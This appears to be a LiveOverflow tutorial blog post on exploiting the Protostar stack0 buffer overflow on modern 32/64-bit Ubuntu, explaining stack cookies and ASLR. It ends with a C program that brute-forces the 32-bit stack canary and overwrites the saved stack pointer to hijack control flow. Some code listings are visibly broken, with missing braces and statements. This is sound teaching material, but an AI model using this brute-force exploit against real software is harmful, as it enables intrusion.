Simple Buffer Overflow on a Modern System


New here? LiveOverflow a YouTube channel about IT Security.

If you are interested in other videos, here are a few I'm proud of:

In December 2015 I have uploaded the first video of my Binary Hacking Course - an attempt of creating a visual video course introducing memory corruption and related topics. After a few videos introducing different topics such as installing Linux in a VM, hexadecimal, writing a simple C program and using gdb and other tools to reverse engineer programs, I quickly moved to the linux image to introduce the basics of exploitation. This system does not have ASLR, DEP or any other exploit-mitigations like stack cookies - so it's easily 20 years behind the current state of the art. But nonetheless it's very important to understand these easy concepts first.

The first video of level stack0 from is now over 1 1/2 years old and since then the style of my videos has changed drastically as I gained more experience from the creation process. And we finally have covered most of the basics. Now it's time to move into the modern world of exploitation, and what better way is there than revisiting this level with a twist - compiled on a modern Ubuntu system. I got the idea because some people watching my videos compiled the code on their system and were surprised to find that they can't reproduce it. And now the question is: Is this simple example still exploitable?

Before we try to answer this question, let's refresh our minds about the vulnerability that is introduced in stack0 and how it can be exploited. You could watch the old video about stack0, or if you are already familiar with the basics, just read the code below.


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
  volatile int modified;
  char buffer[64];

  modified = 0;

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");

If you are familiar with programming and you read this code, you could be confused how you would every reach the "you have changed the 'modified' variable" message, as modified is set to 0 and never changed. But if you know the basics of buffer overflows in C, you will quickly identify the call to gets(). gets() reads user input (until a newline \n or EOF) into the 64byte character big buffer. This buffer[64] and the modified integer are located in the stack memory, because they are local variables. In this case the target variable follows the buffer and reading more characters than the buffer can hold will keep writing data onto the stack and eventually overwrite the zero value of modified (along with everything else that is contained on the stack: return pointer, stored base pointer, environment variables, ...). So the exploit is very easy:

But what is different on a modern system? So let's head into part 1.

Part 1: Is it impossible?

Instead of reading you can also watch my video instead. I think it's much better than the text.

Buffer overflow on a modern system impossible? stack0: part 1

We have a look at stack level 0 from and compile it on a current Ubuntu, to see if it's still exploitable.

So let's compile the code on a modern 64bit Ubuntu! And right there we get a first compiler warning, that using gets() is dangerous. So these kind of old-school bugs are really "hard" to make now - the compiler throws right into your face how dumb you are.

But let's see. When we now try the simple payload we don't get the "modified" message and instead get an exception: "stack smashing detected". What a bummer.

So let's have a look at the assembler code. When we look at the local variables referenced in there and draw a stack where they are located, we notice that the modified variable comes before the buffer[64]. This is bad! This means when we cause a buffer overflow we will never overwrite the target variable.

This is actually a pretty clever buffer overflow mitigation and has to do with the stack cookie. You see, buffers are prone to buffer overflows. Thus reordering the local variables such that non-buffers, like a simple integer variables, come before a dangerous buffer. This protects the program from unintended side-effects because of a modified integer. And the reordering also has the effect, that the buffer is closer to the stack cookie. The stack cookie is responsible for the exceptions. So let's have a look at how that is implemented:

This function has two different paths it could end in. Either the function executes a return and follows the stored return-pointer on the stack (left), or calls __stack_chk_fail() (right). Latter causes the program to abort without every executing a return. Which path is chosen depends on a check - the stack cookie check. You can see in the disassembly, that a value is referenced from the stack ([rbp-0x8]) and moved into rdx. Then fancy xor is used to compare this value from the stack with a value stored somewhere completely else in memory. If they match (xor result is zero), the function is allowed to return. But if we overflowed this value on the stack with something else, then this check fails and the program is aborted:

This obviously also shows you, that if you would know the cookie value you could still overflow it. If you overflow it with the correct value nothing changes. But our example program here has just a one-shot input - there is no interaction where we could try to exploit other bugs first, to leak the cookie value.

So... what can we do now? Game Over?
Let's have a look at those cookies, there is something interesting about them. Here are a few cookies collected on the 64bit version - we execute the program in the debugger multiple times and take notes of the random values:

Notice how all cookies start with a null-byte? Why would you set one byte to a static zero, if you also could increase the randomness by another byte? Well it's a super clever trick. Because a lot of buffer overflows are caused by strcpy(). And strings in C are defined to end with a null-byte \0. So even if I tell you the cookie value, you would never be able to overflow it with the correct cookie value, because you couldn't write beyond the null-byte. Pretty neat, huh? But in our case we have gets(), and this function only stops at a newline or EOF

Let's have a look at some cookie values on a 32bit version of this program. This is compiled with -m32:

We have again a zero byte! This leaves us with only three random bytes. So maximum of 0xffffff possible values. This is a bit more than 16 million possible cookies. And in this case, this is feasible to just guess and hope to get lucky.

This leaves us with one possible exploit plan. We could try to guess the cookie and when we get lucky we can overflow more of the stack. We can't overflow modified, but we could overflow the return-pointer with the address of the if-case that prints the success "modified" message.

Note: The system has ASLR enabled, but the program itself is not compiled position independent by default. This means addresses of code will be static. Other memory areas like loaded libraries or the stack are randomized.

And I have no better Idea than that. This also means 64bit is probably not exploitable, because it's very unlikely we hit one of those 0xffffffffffffff possible cookie values. But on 32bit it looks different and we actually might be able to get lucky there. So let's do that.

Part 2: Let's ignore the cookie and develop the exploit

And again I suggest you to watch the video instead of reading my ramblings.

Identifying another exploit mitigation and find bypass. stack0: part 2

In part 2 we have a closer look at stack0 on a modern system. We are trying to plan an exploit that works in case we can guess the stack cookie. We have to be a bit creative here.

If we want to guess the cookie we have to be 110% sure that our exploit works. So we first develop the exploit as if we know the cookie value. We can do that by setting breakpoints in the debugger and just skip the check. More about that in the video. So let's cause a buffer overflow (as if the cookie was correct) and lets see what happens. It should be easy because we just overwrite the return pointer and thus control eip (instruction pointer). But nope... Look what happened:

We get a Segfault at the return. Not after the return. At the return. Because the ret instruction attempts to read the return-value from the stack by following esp and somehow we have overwritten the stack pointer too. What?! What is going on?
Look at the start of main():

Right at the start the address stored in esp is moved into ecx and then pushed onto the stack. The function does not only save the previous base-pointer, but also saves the current stack pointer. So at the end of the function this value is restored. This means we overflowed it with our buffer overflow. So in order to control the return-pointer, we first have to control this stored stack-pointer. damn. But that should be simple, right? Just overwrite this value with one that points into our controlled buffer and we win!

Unfortunately it's not that trivial, because like I mentioned earlier, the stack is randomized due to ASLR. We don't know where the stack and our buffer will be in memory. Game Over?

Not so fast! We know that a correct value is stored there, so we don't have to overwrite the full address! We just overwrite the lowest byte, for example by filling the buffer with characters right up to the stored stack-pointer, and then a null-byte (end of string) is written to that value.

But there is another small annoyance. When you rerun the binary multiple times, then not only is the base-address (start) of the stack memory area randomized because of ASLR, also the offset inside that area (where our stack frames starts) is randomized. If this would have not been the case, we could have carefully groomed the stack with environment variables (because they are stored at the beginning of the stack), so that overwriting the lowest byte with a zero causes the restored stack-pointer to point into our buffer. But the randomization means we have to get lucky. Here are a few collected stack base addresses along with where our stack-frame lives:

Now we can put everything together. We fill the buffer with the address of the if-case we want to reach and then overflow far enough to overwrite the lowest byte of the stored stack-pointer with a 0x00. If we are lucky with the randomized offset of the stack-frame we will get this:

After restoring the smashed stack-pointer esp points into our buffer with the addresses to the "modified" message. When we continue now, the if-case we want will be executed.

Part 3: The full exploit

I don't explain the code here, because you should definitely watch the video.

Bruteforce 32bit Stack Cookie. stack0: part 3

Bruteforcing stack canary, stack guard, stack cookie with a C program.

What is missing is just the logic to guess the cookie value. I decided to write a C program, but somebody else succeeded with a simple shell script. There are several pitfalls for writing this code (hint: stdout buffering), so you should really watch the video, but it's not that important.

Below you can find my final code. I ran it with ghetto-parallelization and after several millions attempts I had success:

You can find my code below.
And if you are interested in more videos, here are a few I'm proud of:


#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <signal.h>
#include <pty.h>
#include <fcntl.h>
#include <time.h>
#include <sys/wait.h>

#define WAITMAX 10000

int master;

// handle SIGCHLD
void handle(int signum)
    char buffer1[256];
    char buffer2[256];
    int nread1 = 0;
    int nread2 = 0;
    // read the first output. Should be "Try again"
    nread1 = read(master, buffer1, 12);
    if(nread1>0) buffer1[nread1] = '\0';
    else buffer1[0] = '\0';

    // read the second output. Could be *** stack smash smashing detected or the success "modified" message
    nread2 = read(master, buffer2, sizeof(buffer2));
    if(nread2>0) buffer2[nread2] = '\0';
    else buffer2[0] = '\0';

    // if the second output starts with "you", we should have gotten the modified success message
    if(nread2>2 && (buffer2[0] == 'y' && buffer2[1] == 'o' && buffer2[2] == 'u')) {
        printf("\nSIG(%d) stdout1 (%d): \"%s\"\n", signum, nread1, buffer1);
        printf("\nSIG(%d) stdout2 (%d): \"%s\"\n", signum, nread2, buffer2);

int main(int argc, char* argv[]) {
    time_t start_time;
    int seed;
    int next_debug_msg;
    long exec_count;

    // check if a seed was specified
    if(argc<2) {
        printf("usage: %s \n",argv[0]);

    // seed the PRNG
    seed = atoi(argv[1]);

    // disable buffering for stdout
    setbuf(stdout, NULL);

    // define a signal handler to get notified when a child dies
    struct sigaction sigchld_action = { .sa_handler = handle, .sa_flags = SA_NOCLDWAIT };
    sigaction(SIGCHLD, &sigchld_action, NULL);

    // amount of execs when next message is shown
    // remember start time to calculate execs per second
    // counting the executions

    // a pretentious way to do a while(true) loop.
    for(;;) {
        // count the executions

        // create a new process and connect it to a pseudo terminal
        // this forces the target process to flush on newlines and we don't loose it because of "abort"
        pid_t pid = forkpty(&master, NULL, NULL, NULL);
        if(pid==-1) exit(1);

        // disable some terminal behaviour like echo input and behaviour of special characters ~(ECHO | ECHONL | ISIG);
        struct termios tios;
        tcgetattr(master, &tios);
        tios.c_lflag = 0; // disable all options
        tcsetattr(master, TCSANOW, &tios);

        if(!pid) {
            // the child: execute stack0 32bit
            char *argv[]={ "./stack0_32", 0};
            execv(argv[0], argv);
        } else {
            // the parent: send the buffer overflow payload

            // code redirect target
            // 0x080484cf <+68>:    push   $0x8048590
            // 0x080484d4 <+73>:    call   0x8048360 
            // [0x080484cf][0x080484cf][0x080484cf]...[0x080484cf]|[cookie][padding][overwrite 1 byte of stored esp]
            unsigned char input[] = {0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0x0, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42, 0xa, 0x0};

            // generate three random cookie bytes. (first byte stays 0x00)
            // make sure no newline is included because the target uses gets() and that would stop the input early
            do{ input[65] = (rand() % 256); } while (input[65]=='\n');
            do{ input[66] = (rand() % 256); } while (input[66]=='\n');
            do{ input[67] = (rand() % 256); } while (input[67]=='\n');

            // write the buffer overflow payload to the pseudo terminal
            write(master, input, sizeof(input));

            // check if the process should print current status
            if(exec_count%(next_debug_msg)==0) {
                printf("Process: %d | exec: %d (%ld/s) | last cookie: [%02x,%02x,%02x]\r", seed, exec_count, exec_count/((time(NULL)-start_time)), (unsigned char)input[65], (unsigned char)input[66], (unsigned char)input[67]);
                // use random to determine when the next message should be shown, to have each process print another time
                next_debug_msg = (rand() % WAITMAX)+1;

            int status;
            int wait_ret;
            // check for the health of the child process in a loop
            for(int i=0;;i++) {
                wait_ret = waitpid(pid, &status, WNOHANG);
                // break the loop if the child is not running anymore. on to the next round!
                if(wait_ret==-1) break;
                // after the 10th wait send a kill to the child. maybe it's hanging.
                if(wait_ret==0 && i==10) kill(pid, SIGKILL);
                // sleep a short amount of time
                nanosleep((const struct timespec[]){ {0, 10000000L} }, NULL);
            // close the opened pseudo terminal